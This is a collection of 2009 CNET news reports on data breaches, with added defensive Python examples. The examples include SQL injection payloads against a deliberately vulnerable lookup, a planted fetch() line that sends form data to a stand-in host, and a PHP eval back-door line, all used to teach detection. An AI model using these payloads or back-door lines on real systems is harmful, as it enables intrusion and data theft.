
Security

October 20, 2009 5:01 PM PDT

ChoicePoint to pay $275,000 in latest data breach

by Elinor Mills

ChoicePoint, one of the nation's largest data brokers, has been fined $275,000 by the U.S. Federal Trade Commission for a data breach that exposed personal information of 13,750 people last year.

In April 2008, ChoicePoint turned off a key electronic security tool that it used to monitor access to one of its databases and failed to notice the problem for four months, according to an FTC statement.

During that period, unauthorized searches were conducted for 30 days on a ChoicePoint database that contained Social Security numbers and other sensitive information, the FTC said.

The FTC alleged that ChoicePoint's conduct violated a 2006 court order requiring the company to institute a comprehensive information security program following a 2005 breach that compromised the personal information of more than 163,000 people and resulted in at least 800 cases of identity fraud. The company was ordered to pay $10 million in civil penalties and $5 million to consumers in that case.

To settle the recent charges, ChoicePoint agreed to pay the fine and provide reports on its data protection practices to the FTC every two months for two years.
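The ChoicePoint failure above was not a missed alert but a monitoring tool that stopped running and nobody noticed for four months. The control that catches that is a check on the monitors themselves: every audit source is expected to report within a fixed interval, and silence is itself an alert. The following Python is an added example of that check, not code from ChoicePoint or the FTC; the audit feed, source names and one-day threshold are constructed for illustration.

```python
from datetime import datetime, timedelta, timezone

# Constructed sample audit feed, one event per line: "<ISO timestamp> <source> <event text>".
# The db-access-monitor feed goes quiet after 2008-04-02 while the other feeds keep reporting.
SAMPLE_AUDIT_LOG = """\
2008-04-01T09:15:00Z db-access-monitor query user=analyst7 rows=12
2008-04-01T09:16:30Z vpn-auth-log login user=jdoe result=ok
2008-04-02T11:00:00Z db-access-monitor query user=analyst2 rows=40
2008-04-03T08:05:00Z vpn-auth-log login user=asmith result=ok
2008-08-12T08:00:00Z vpn-auth-log login user=jdoe result=ok
2008-08-12T08:30:00Z web-proxy-log GET host=example.test
"""

# Sources that must report at least once per MAX_SILENCE (hypothetical names).
# A source listed here that never appears in the feed is an alert too.
EXPECTED_SOURCES = {"db-access-monitor", "vpn-auth-log", "web-proxy-log", "badge-reader-log"}
MAX_SILENCE = timedelta(days=1)


def parse_ts(text):
    """Parse the feed's UTC timestamp format into an aware datetime."""
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def last_seen_by_source(log_text):
    """Return {source: timestamp of its most recent event} from the audit feed."""
    last = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts_text, source, _event = line.split(" ", 2)
        ts = parse_ts(ts_text)
        if source not in last or ts > last[source]:
            last[source] = ts
    return last


def silent_sources(log_text, now, expected=EXPECTED_SOURCES, max_silence=MAX_SILENCE):
    """Expected sources quiet for longer than max_silence as of `now`.

    Returns {source: length of silence}, with None for a source that never reported.
    """
    last = last_seen_by_source(log_text)
    findings = {}
    for source in sorted(expected):
        if source not in last:
            findings[source] = None
        elif now - last[source] > max_silence:
            findings[source] = now - last[source]
    return findings


if __name__ == "__main__":
    now = parse_ts("2008-08-12T09:00:00Z")
    for source, gap in silent_sources(SAMPLE_AUDIT_LOG, now).items():
        detail = "never reported" if gap is None else f"silent for {gap.days} days"
        print(f"ALERT {source}: {detail}")
```

Run against the constructed feed, the check flags db-access-monitor (silent for 131 days) and badge-reader-log (never seen) while the feeds that reported within the last day stay quiet. Two design points: the check has to run somewhere other than the host whose monitor it watches, or a disabled host silences both; and the threshold should be set from the source's normal event rate, since a feed that legitimately reports once a week needs a longer window than a database access monitor.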

Meanwhile, payroll processor PayChoice has had two data breaches in less than a month. On October 1, the company said it was investigating a breach in which targeted e-mails were sent to customers that attempted to trick them into downloading malware.

Then last week, PayChoice told customers it was again shutting down its online portal after clients started noticing fake employees being added to their payroll in what is likely the second stage of a broader attack, according to the Security Fix blog.

It appears that attackers stole login IDs and passwords by exploiting a weakness in the Web site component that allows customers to change their portal passwords, the report said. The usernames and passwords were then included in the e-mails sent out to customers a few weeks ago.

Originally posted at InSecurity Complex
October 1, 2009 3:54 PM PDT

Targeted e-mails distribute malware in PayChoice breach

by Elinor Mills

Payroll processor PayChoice said Thursday it is investigating a breach in which customers received targeted e-mails purporting to be from the company but were designed to trick people into downloading malware.

Workers received e-mails last week that directed them to download a browser plug-in or visit a Web site so they could continue accessing the Onlineemployer.com PayChoice portal. Malware in the download and on the Web site turned out to exploit holes in Internet Explorer, Adobe Flash, and Adobe Reader, PayChoice said.

The e-mails were targeted to individuals and included their user names, login IDs, and partial passwords, thus increasing the chance that recipients would be likely to fall for the ruse.

In a statement, PayChoice did not say how many people received the e-mails but said most of the employees served by PayChoice do not use the portal. PayChoice, based in Moorestown, N.J., provides payroll software and services to 125,000 businesses.

"Within hours of the attack, the company notified its clients, shut down the site www.onlineemployer.com and deployed further security measures to protect client information before restoring access to the system," the company said in the statement. "PayChoice also immediately notified the authorities and is working with federal law enforcement to find those responsible."

The company confirmed a report on The Washington Post's Security Fix blog that the malware downloaded a Trojan horse dubbed "Bredolab," which tries to put additional malicious files on the system and to disable host-based intrusion prevention systems, according to Microsoft's Malware Protection Center.

"PayChoice discovered a security breach in its online system on Wednesday, September 23, 2009," PayChoice Chief Executive Robert Digby said in an earlier statement. "We are handling this incident with the highest level of attention as well as concern for our clients, software customers and the employees they serve."

The company has hired two forensic experts to investigate the breach, Digby said.

The e-mail was sent through Yahoo's Web email service and the Web sites linked to in the emails were hosted on servers in Poland, according to an e-mail PayChoice sent to customers after the incident that was obtained by Security Fix.

The PayChoice portal displays this warning about the social engineering e-mail. (Credit: OnlineEmployer.com)
Originally posted at InSecurity Complex
August 20, 2009 4:42 PM PDT

Hacker Mitnick may sue AT&T over data breach

by Elinor Mills

Kevin Mitnick (Credit: Declan McCullagh/CBS Interactive)

After having his AT&T wireless account breached and his personal information posted on the Web, famed hacker Kevin Mitnick thought the least the cellular service provider could do was compensate him for his troubles.

Instead, the company informed Mitnick it plans to cancel his contract and not pay damages for the breach, he said. (His service was still working Thursday afternoon.) Now he may sue.

"AT&T wants me off their network because they can't secure my account, and after being a loyal customer for almost a decade I find that reprehensible," he told CNET News on Thursday. "It apparently is more cost effective to drop me than to secure their customer's information."

"My attorney is going to review my contract to see what, if any, restrictions are in my service agreement," he said. "I may file a lawsuit for invasion of privacy for the failure to adequately protect my information."

The irony is that he speculates that whoever is responsible for getting into his account used social engineering to do so. Mitnick spent five years in jail for breaking into computer networks, mostly using social engineering to get information out of insiders that enabled him to access their networks.

He describes such social engineering techniques in fictional stories in his book "The Art of Deception," including examples involving PacBell in which workers at retail stores reveal customer account details over the phone to someone they think works for the company.

"These guys probably read my book and decided to steal my information using social engineering because it is so easy," he said. "I told AT&T about this and they just ignored it."

"The bigger issue is that this ineffective security affects all AT&T customers," he said. "They need to start shoring up their defenses."

Mitnick learned in June that someone had posted his address, land and mobile phone numbers, PIN, e-mail address, instant messenger handles, and the last four digits of his Social Security number on the Web in March.

When he failed to get a response from AT&T after he complained, he called a lawyer who asked AT&T to pay an undisclosed amount for damages to his reputation and property rights, he said.

"We investigated Mr. Mitnick's claims and determined they were without any foundation," said AT&T spokeswoman Jenny Bridges. "We refused Mr. Mitnick's demands for money, but did offer to let him out of his contractual obligations so that he could find a carrier that he would be comfortable with."

Asked if Mitnick could keep AT&T as his provider, Bridges said she could not comment beyond that statement.

Mitnick's high-profile status makes him a celebrity among some hackers and a popular target for others. He's had his Web site hacked numerous times over the years, including twice in the past several months. He's even had trouble with Facebook after the social networking site disabled his account, believing him to be an impostor.

Most recently, Mitnick's site was among a group of security sites that were hacked and publicized on the eve of the Black Hat conference last month. As a result of the hacking, Mitnick was asked by his Web hosting provider, HostedHere.net, to find another place to host his site.

This isn't the first time Mitnick's AT&T account information apparently has been breached.

CNET News learned almost a year ago that someone had gotten access to Mitnick's mobile account while he was on a trip to Bogota, Colombia, but at the request of Mitnick at that time, agreed not to publish the information while the case was being investigated.

On his way to Colombia, during a stopover in Los Angeles, Mitnick received warning that his AT&T account would be breached with a social-engineering attack, he said in an instant message exchange in September 2008. He called AT&T with the details and asked it to take extra precautions to protect his account and require someone trying to change the account to provide the password verbally and not just the Social Security number, he said. Despite that effort, when he landed hours later, his password had been reset and the account was no longer in his control.

"I learn that these hackers (they called to warn me first) called an ATT Corporate store in Idaho (I have the rep's name) and she changed my e-mail address to what the hackers requested. So they just did a pw reset," he wrote in the IM exchange.

Asked about it in a follow up conversation months later, Mitnick said the matter had been resolved and declined to comment further.

That Colombia trip was noteworthy for Mitnick for other reasons. On his return, Mitnick was detained for four hours and his computer equipment inspected after he landed in the Atlanta airport for unknown reasons.

Originally posted at InSecurity Complex
August 17, 2009 2:28 PM PDT

Three men indicted in largest U.S. data breach

by Elinor Mills

Two Russians and a Florida man were charged on Monday with hacking into Heartland Payment Systems, 7-Eleven, and the Hannaford Brothers supermarket chain, and stealing data related to more than 130 million credit and debit cards.

The indictment names 28-year-old Albert Gonzalez of Miami, who already has been charged with stealing data related to 40 million credit cards from eight major retailers, including TJ Maxx, and two unnamed co-conspirators based in Russia.

The breach involving Heartland and the others is believed to be the largest hacking and identity theft case ever prosecuted by the U.S. Department of Justice. In addition to Heartland, 7-Eleven, and Hannaford Brothers, it involves two unnamed corporate victims, according to a statement from the U.S. Attorney's office.

The three men were indicted on charges of conspiring to hack into computer networks and stealing data as far back as October 2006. Gonzalez, whose aliases include "segvec" and "soupnazi," and the others allegedly found victims on a list of Fortune 500 companies and visited retail locations to see what type of checkout systems they used.

They used SQL injection attacks to steal the data and used computers in California, Illinois, New Jersey, Latvia, Ukraine, and the Netherlands for storing malware and stolen data and launching attacks, according to the indictment. In an SQL injection attack, the attacker submits input to a Web application, such as a form field or a URL parameter, that contains SQL syntax; if the application pastes that input into a database query without separating code from data, the attacker's text runs as part of the query, letting him read or alter data the application never meant to expose.
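The mechanism described above, as an added example in Python that is not part of the indictment or of CNET's report: a lookup that builds its query by string concatenation, the same lookup with the input bound as a parameter, and two constructed payloads, one that dumps every row of the table and one that pulls a second table through the first query's result. The table names, columns and card numbers are made-up test data; the same class of attack is reported later on this page against the Army Web servers.

```python
import sqlite3


def build_demo_db():
    """Constructed in-memory stand-in for a payment-card store (test data, not real PANs)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cards (id INTEGER PRIMARY KEY, merchant TEXT, pan TEXT)")
    conn.executemany(
        "INSERT INTO cards (merchant, pan) VALUES (?, ?)",
        [("store-a", "4111111111111111"),
         ("store-b", "5500000000000004"),
         ("store-c", "340000000000009")],
    )
    # A second table the card lookup was never meant to touch.
    conn.execute("CREATE TABLE users (name TEXT, pw_hash TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'sha1$deadbeef')")
    return conn


def lookup_vulnerable(conn, merchant):
    """Builds the statement by concatenation: the caller's text becomes SQL syntax."""
    query = "SELECT pan FROM cards WHERE merchant = '" + merchant + "'"
    return [row[0] for row in conn.execute(query)]


def lookup_safe(conn, merchant):
    """Parameterized statement: the input is bound as a value and cannot change the query."""
    rows = conn.execute("SELECT pan FROM cards WHERE merchant = ?", (merchant,))
    return [row[0] for row in rows]


# Constructed attacker inputs.
TAUTOLOGY = "' OR '1'='1"                          # makes the WHERE clause always true
UNION_PULL = "' UNION SELECT pw_hash FROM users --"  # appends a second SELECT, comments out the rest


if __name__ == "__main__":
    db = build_demo_db()
    print("legit    :", lookup_vulnerable(db, "store-a"))
    print("tautology:", lookup_vulnerable(db, TAUTOLOGY))   # every PAN in the table
    print("union    :", lookup_vulnerable(db, UNION_PULL))  # the admin password hash
    print("safe     :", lookup_safe(db, TAUTOLOGY))         # no merchant has that literal name
```

With the vulnerable lookup, the tautology payload returns all three card numbers and the UNION payload returns the password hash from the other table; the parameterized lookup returns nothing for either, because the driver sends the payload to the database as a string value rather than as part of the statement. One caveat on the demo itself: Python's sqlite3 module runs one statement per execute() call, so a stacked payload such as `'; DROP TABLE cards; --` raises an error here even though it would succeed against a driver and database that accept multiple statements.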

They also allegedly installed backdoors and sniffers to intercept data in real time as it was processed by the victims and tried to hide their actions by accessing the victim networks through proxy computers, modifying their software so as to evade detection by antivirus programs and programming it to delete traces of the malware from victim networks, according to the indictment.

The men also tried to sell the stolen data to others, the indictment alleges. They are charged with conspiracy to gain unauthorized access to computers, commit fraud in connection with computers and damage computers, as well as conspiracy to commit wire fraud. They face up to 35 years in prison as well as a fine of $1.25 million.

Gonzalez, who is in federal custody, was charged in May 2008 in New York with hacking the computer network of Dave & Buster's restaurant chain and was named in an indictment in Massachusetts in August 2008 related to the TJX breach. Other alleged victims in those cases include BJ's Wholesale Club, OfficeMax, Boston Market, Barnes & Noble, Sports Authority, Forever 21, and DSW. He faces trial on the New York charges next month.

Heartland reported the breach on presidential Inauguration Day in January and said that although it occurred last year, it found evidence of the intrusion just the week prior.

Formerly a federal government informant, Gonzalez also was arrested in New Jersey in 2003 on charges related to ATM and debit card fraud.

Originally posted at InSecurity Complex
July 27, 2009 4:02 PM PDT

Network Solutions breach exposes nearly 600,000

by Elinor Mills

Network Solutions is investigating a breach on its servers that may have led to the theft of credit card data of 573,928 people who made purchases on Web sites hosted by the company.

Network Solutions notified 4,343 of its nearly 10,000 e-commerce merchant customers on Friday about the breach. It affects 573,928 cardholders whose name, address, and credit card number were exposed between March 12 and June 8, said Susan Wade, a spokeswoman for Network Solutions.


Unexplained code was discovered in early June on servers hosting e-commerce customer sites during routine maintenance, she said. The company called in a third-party forensics team to help with the investigation, and on July 13 the team had deciphered enough of the code to determine that it could be related to credit card data, she added.

Credit card transactions were intentionally diverted by an unknown source from certain Network Solutions servers to servers outside, Network Solutions wrote in an e-mail to merchant customers.

"So we notified law enforcement and began the process of notifying our customers," Wade said. "At this point, we don't have a reason to believe that (the data) has been used, but we are working with the credit card companies," nonetheless.

Network Solutions also is paying to have credit-monitoring specialist TransUnion help the merchants notify their customers according to data breach notification laws in effect in certain states. Affected consumers will get 12 months of free credit-monitoring services.

It's unknown how the malicious code got onto the system and where it came from, Wade said.
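The code in this case was found by chance during maintenance. The systematic way to notice unexpected code on a hosting tier is a file-integrity baseline: hash every file in the deployed tree when it is known good, then compare on a schedule and treat any added or modified file as a finding. The following Python is an added example of that check, not Network Solutions' tooling or anything from its investigation; the directory layout, file contents and the planted script are constructed for the demonstration.

```python
import hashlib
import tempfile
from pathlib import Path


def hash_tree(root):
    """Map each regular file under root (as a POSIX-style relative path) to its SHA-256 digest."""
    root = Path(root)
    digests = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        h = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(65536), b""):
                h.update(chunk)
        digests[path.relative_to(root).as_posix()] = h.hexdigest()
    return digests


def diff_baseline(baseline, current):
    """Files added, removed, or changed relative to the recorded baseline."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline.keys() & current.keys() if baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def demo():
    """Constructed scenario: baseline a tiny checkout tree, then plant code that diverts form data."""
    with tempfile.TemporaryDirectory() as tmp:
        site = Path(tmp)
        (site / "js").mkdir()
        (site / "checkout.php").write_text("<?php process_payment($_POST); ?>\n")
        (site / "js" / "cart.js").write_text("function addToCart(id) {}\n")
        baseline = hash_tree(site)  # in practice: stored and signed off-host

        # Constructed tampering: append a script that posts checkout fields to an outside host
        # (exfil.invalid is a reserved, non-resolving name) and drop a new file with a back door.
        with open(site / "js" / "cart.js", "a") as f:
            f.write("fetch('https://exfil.invalid/c', {method: 'POST', body: document.forms[0].innerHTML});\n")
        (site / "js" / "jquery.min.php").write_text("<?php eval(base64_decode($_POST['c'])); ?>\n")

        return diff_baseline(baseline, hash_tree(site))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:9s}: {paths}")
```

The comparison reports js/cart.js as modified and js/jquery.min.php as added. Two points for using this in anger: keep the baseline and the comparison job off the hosts being checked, so an attacker who owns the server cannot also rewrite the record; and understand the limit of the method, which sees only what is on disk. Code injected into a running process, or a change to a database-stored page template, needs a different check.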

Merchants and consumers can get more information on the Care and Protect Web site Network Solutions has set up. "We really feel terribly about this," Wade said.

"We store credit card data in an encrypted manner, and we are PCI (Payment Card Industry)-compliant. Unfortunately, any company operating in our business could have become a victim of this type of invasion," the company said on a blog post on the customer information Web site. "In this situation, the unauthorized code appears to have transmitted information about credit card transactions as they were being completed; it did not involve a vulnerability in the way we store data in our systems."

The breach does not affect Network Solutions' other businesses, which include domain registration, e-mail hosting, and online marketing.

Originally posted at InSecurity Complex
July 16, 2009 8:56 AM PDT

CEOs, other execs disagree on security

by Lance Whitney

CEOs and their senior executives don't see eye to eye on key security issues, according to a new survey.

Many CEOs don't consider their own companies vulnerable to security attacks and are confident in their ability to combat those attacks, says a survey released Wednesday. However, those findings contrast with the opinions of senior executives who report to the CEO. They see their companies as more vulnerable and are not confident they can stop data theft. The survey was sponsored by security company Ounce Labs and conducted by security researcher Ponemon Institute.

The survey sought to determine how aware CEOs and other senior executives are of their own data protection efforts--how effective they are, how they justify the cost of security, and whether they support the goals of the organization.

The survey found that 82 percent of senior executives said their organization has experienced a data breach, and 94 percent of those said they had been hit in the last six months. About 53 percent say they're attacked on a daily or even hourly basis.

Only 58 percent of the senior execs are confident in their company's ability to identify and respond to breaches that result in the theft of information. And just 32 percent think their company is rarely attacked.

Among CEOs, 93 percent are confident in their organization's ability to identify and thwart security breaches. And 48 percent said they believe their organizations are rarely attacked.


The responsibility for securing a company's data was also a question mark. Among CEOs, 53 percent felt the chief information officer is accountable for data protection, while only 25 percent of other senior executives felt the same way. And whoever is responsible, that person's job is seen as safe. Around 85 percent of executives questioned believe a failure to stop a security attack under their watch would not jeopardize their job.


To gather the data, Ponemon Institute questioned 30 CEOs and 183 other top-level executives who report to CEOs, including chief operating officers, division presidents, and chief information officers, over a six-month period ending in June.

July 15, 2009 12:45 PM PDT

Lessons from Twitter's security breach

by Josh Lowensohn
and
Caroline McCarthy

Twitter's latest security hole has less to do with its users than it does with its staff, but lessons can be learned on both sides.

In the case of Jason Goldman, who is currently Twitter's director of product management, the simplicity of Yahoo's password recovery system was enough to let a hacker get in and gain information from a number of other sites, including access to other Twitter staff's personal accounts.

The aftermath of the hack, which took place in May, is only now playing out. Documents that a hacker using the alias Hacker Croll obtained from Goldman's account and others (including that of Twitter co-founder Evan Williams) could be a treasure trove of inside information about the company and its plans.

While Croll had planned to release the entire batch publicly (and at once), tech blog TechCrunch posted news late Tuesday that it had received the documents and was considering publishing details of at least some of them.

Although it seems that Twitter has been thrust into this situation a bit unfairly, a hack along these lines could have happened to the executives of more Web companies than anybody would like to admit. What it really highlights is the extreme interconnectedness of the social Web: with the likes of e-mail contact importing and data-portability services like Facebook Connect now commonplace, a savvy hacker can have access to multiple accounts simply by accessing one.

A post Wednesday on Twitter's official blog highlights just how far-reaching this can be.

"About a month ago, an administrative employee here at Twitter was targeted and her personal email account was hacked," the post from co-founder Biz Stone read. "From the personal account, we believe the hacker was able to gain information which allowed access to this employee's Google Apps account which contained Docs, Calendars, and other Google Apps Twitter relies on for sharing notes, spreadsheets, ideas, financial details and more within the company."

Following that attack, Twitter conducted a security audit, and Stone's post says that there was not a security vulnerability in Google Apps and that Twitter continues to use the suite internally. A separate hack targeted the account of CEO Evan Williams' wife, and from that some of Williams' personal accounts were accessed as well, Stone explained.

But Twitter is front and center in the news these days, and is now talked about as a communications protocol as much as a Web start-up. Not only does that make it a particularly appealing target, but also...

Originally posted at Webware
June 9, 2009 1:17 PM PDT

T-Mobile says network was not hacked or breached

by Elinor Mills

A T-Mobile spokesman said on Tuesday that data someone posted to a security e-mail list over the weekend was legitimate T-Mobile data but not customer information, and that the phone company's network was not hacked or breached as the poster claimed.

The statement raises more questions than it answers. If indeed there was no network hack, could there have been an inside leak? Or could it have been something as low-tech as dumpster diving, in which records are obtained from trash bins outside a company's offices?

All T-Mobile would say is that it is investigating how the information was obtained.

On Saturday, someone posted to the Full Disclosure e-mail list claiming to have hacked into T-Mobile's computer network.

"We have everything, their databases, confidential documents, scripts and programs from their servers, financial documents up to 2009," the poster wrote, adding that the data was being offered up to the highest bidder. As evidence of the hack, the post included a series of lines that appear to reference operating systems and possibly IP addresses.

T-Mobile said the data is not customer data, but declined to say what it is. On Monday, T-Mobile said it was investigating the situation.

Then late on Monday, the company issued a statement that said: "Regarding the recent claim on a Web site, we've identified the document from which information was copied, and believe possession of this alone is not enough to cause harm to our customers."

On Tuesday, T-Mobile issued an updated statement that removed that wording and added: "The company is conducting a thorough investigation and at this time has found no evidence that customer information, or other company information, has been compromised. Reports to the contrary are inaccurate and should be corrected."

T-Mobile says the data isn't customer data. So what is it? (Credit: T-Mobile)
May 29, 2009 1:50 PM PDT

Report: Turkish hackers breached U.S. Army servers

by Elinor Mills

Hackers based in Turkey penetrated two U.S. Army Web servers and redirected traffic from those Web sites to other pages, including one with anti-American and anti-Israeli messages, according to a report in InformationWeek.

The hackers, who go by the group name "m0sted," breached a server at the Army's McAlester Ammunition Plant in Oklahoma on January 26 and a server at the U.S. Army Corps of Engineers' Transatlantic Center in Winchester, Va., on September 19, 2007, the report said.

Investigators believe an SQL injection attack, in which crafted input submitted to the sites reached their Microsoft SQL Server databases as query syntax, was used to gain access to the servers.

It is unclear whether any sensitive information was accessed, according to the report.

Search warrants have been served on Microsoft, Yahoo, Google, and other ISPs and e-mail providers, while a criminal investigation is underway at the Defense Department, the U.S. Army's Judge Advocate General's Office, and the Computer Emergency Response Team, InformationWeek reported.

The same group defaced the United Nations Web site in 2007, also using a SQL injection attack.

May 20, 2009 1:44 PM PDT

Report: Attackers exploit IIS hole to breach university server

by Elinor Mills

Updated 6 p.m. PDT with Microsoft comment.

It apparently didn't take long for hackers to try to take advantage of a zero-day hole in Microsoft Internet Information Services (IIS).

Ball State University in Muncie, Ind., told The Register that servers running the software were breached on Monday, the same day Microsoft warned the public about the vulnerability.

Students accessing their iWeb pages on Monday saw messages saying the system had been hacked, The Register reported on Wednesday. There is no evidence that data was stolen or malicious files uploaded; however, the iWeb accounts were expected to be offline until Thursday or Friday, according to Patty Lucas, a senior help desk support administrator for the university's computing services department.

Microsoft, meanwhile, said it has investigated a public report of a targeted attack on the IIS hole, but did not specify whether it was the Ball State University breach that was looked into.

The investigation "revealed that the vulnerability was not exploited to accomplish this attack," a Microsoft spokeswoman wrote in an e-mail late on Wednesday. "Microsoft is still not aware of attacks that are trying to use this vulnerability or of customer impact at this time."

The computing services department referred a call from CNET News on Wednesday afternoon to the communications department, which was already closed for the day.

The vulnerability could allow an attacker to gain access to a location that normally requires authentication by sending a specially crafted anonymous HTTP request, according to Microsoft's security advisory. The problem lies in the way the WebDAV extension for IIS processes HTTP requests.

According to a posting to the Full Disclosure security e-mail list on Friday, the IIS security vulnerability was discovered on May 12 by Nikolaos Rangos.
